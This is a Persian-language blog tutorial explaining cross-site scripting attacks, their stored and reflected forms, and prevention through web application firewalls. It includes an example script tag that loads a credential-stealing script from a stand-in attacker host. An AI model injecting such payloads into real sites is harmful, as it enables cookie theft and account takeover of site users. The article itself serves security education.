021-71053903 [email protected] پشتیبانی از شنبه تا چهارشنبه ساعت 9 الی 16

Xss چیست ؟! آشنایی با حملات Xss

باگ xss یا Cross site scripting یک دستور با کد های مخرب جاوا اسکریپت است که برنامه وب آسیب پذیر تزریق می کند.XSS یا Cross site scripting با سایرحمله وب (مانند SQL Injection) متفاوت است ، به این دلیل که مستقیماً برنامه مورد نظر خود را هدف قرار نمی دهد. درعوض ، کاربران برنامه وب کسانی هستند که در معرض خطر هستند.

حملات xss یا Cross site scripting چیست؟

حمله xss اهداف خاصی دارد و به طور کلی شاید تروجان را در وبسایت شما فعال کند یا محتوای صفحه اصلی شمارو اصلاح کنن کاربران را به صفحه های دیگر انتقال دهند و اطلاعات شخصی آن ها را به سرقت ببرند که بدترین چیز کوکی ها لو میرود که باعث جعل هویت میشود که میتواند حساب های شخصی کاربران را فاش کند.

اگرچه مخفف CSS ، Cross Site Scripting میباشد اما با توجه به اینکه CSS به عنوان مخفف Cascading Style Sheets به کار برده میشود، به همین دلیل از XSS برای مخفف Cross Site Scripting استفاده میشود.

دسته بندی حملات :

  • ماندگار : این اسکریپت یه صورت دائمی میماند این اتفاق زمانی می افتد که یک اسکریپت مخرب مستقیماً به یک برنامه وب آسیب پذیر تزریق می شود.
  • منعکس شده : شامل بازتاب یک اسکریپت مخرب از یک برنامه وب ، بر روی مرورگر کاربر است. اسکریپت در یک پیوند تعبیه شده است و فقط پس از کلیک بر روی این لینک فعال می شود.

حملات ماندگار در xss یا Cross site scripting :

برای ماندگار کردن اسکریپت در حمله xss به صورت موفقیت امیز باید ابتدا هکر باید این اسیب پذیری xss یا Cross site scripting را پیدا کند و آن را در سرور تزریق کند.

مثال حمله ماندگار :

به طور مثال وقتی هکر این اسیب پذیری را کشف کند کد های جاوا اسکریپت خود را به وب سایت تزریق میکند وقتی که تزریق میشود به صورت یک پنجره پاپ اپ نمایش داده میشه که شاید از شما نام کاربری یا ایمیل شمارا دریافت کند.مثال :

<script src = ”http://hackersite.com/authstealer.js”>

در کد بالا یک پنجره پاپ اپ برای کاربر باز میشه که ماهمانطور که گفتم شاید حاوی یه پیغامی و …. باش که این قابلیت رو داره کوکی های کاربران را به سرقت ببره وقتی کوکی های شما مورد هدف قرار بگیره خیلی از اطلاعات شما شاید مورد هک قرار بگیره رمز های عبور کارت بانگی اطلاعات شخصی و… بر خلاف حمله منعکس شده پس از کلیک روی لینک فعال میشود فقط باید کاربر از صفحه وب بازدید کند ولی به طور کلی حلمه ماندگار بسیار سخت تر از حمله منعکس شده است.

پیشگیری و کاهش حملات حملات xss یا Cross site scripting چیست؟ :

فایروال برنامه وب (WAF) متداول ترین راه حل برای محافظت در برابر حملات xss یا Cross site scripting و برنامه های وب است.

WAF ها از روشهای مختلفی برای مقابله با بردارهای حمله استفاده می کنند. در مورد XSS ، بیشتر برای شناسایی و مسدود کردن درخواست های مخرب به فیلترهای مبتنی بر امضا متکی هستند.

مطابق با بهترین شیوه های صنعت ، فایروال برنامه وب ابری Imperva از فیلتر امضا نیز برای مقابله با حملات اسکریپت کراس سایت استفاده می کند.

Imperva cloud WAF به عنوان یک سرویس مدیریت شده ارائه می شود ، که به طور مرتب توسط تیمی از کارشناسان امنیتی برگزار می شود که دائماً قانون امنیتی را با امضاهای بردارهای حمله تازه کشف شده به روز می کنند.

فن آوری کلاچینگ Imperva بطور خودکار داده ها را از طریق شبکه خود جمع می کند و به سود کلیه مشتریان حمله می کند.

رویکرد شلوغی ، پاسخ سریع را به تهدیدات روز صفر می دهد و تمام جامعه کاربر را در برابر هرگونه تهدید جدید محافظت می کند ، به محض شناسایی یک حمله تک.

Crowdsourcing همچنین استفاده از سیستم شهرت IP را امکان پذیر می کند که متخلفین مکرر ، از جمله منابع بات نت را که مجدداً مورد استفاده مجرمان متعدد قرار می گیرند ، مسدود می کند.جلوگیری از حملات xss

مقالات بیشتر :

SQL Injection چیست ؟! ساخت SQLI با پایتون !!

باگRCE چست و اکسپلویت نویسی باگ RCE با پایتون

Xss چیست ؟!

باگ xss یا Cross site scripting یک دستور با کد های مخرب جاوا اسکریپت است که برنامه وب آسیب پذیر تزریق می کند و به صورت غیر مستقیم برنامه مورد نظر خود را هدف قرار می دهد.

محمد محمدپور

34 مطلب منتشر شده

محمد محمد پور علاقه مند به برنامه نویسی پایتون شاخه ی امنیت تست و نفوذ کارشناس IT دانشگاه کرج علاقه های شخصی ویدیو گیم فیلم موزیک

درباره این مطلب نظر دهید !

محصولات فروش پایتونی ها

%60
تخفیف

آموزش فیگما (Figma)

30,000 تومان
3
%69
تخفیف

آموزش برنامه نویسی پایتون

35,000 تومان
2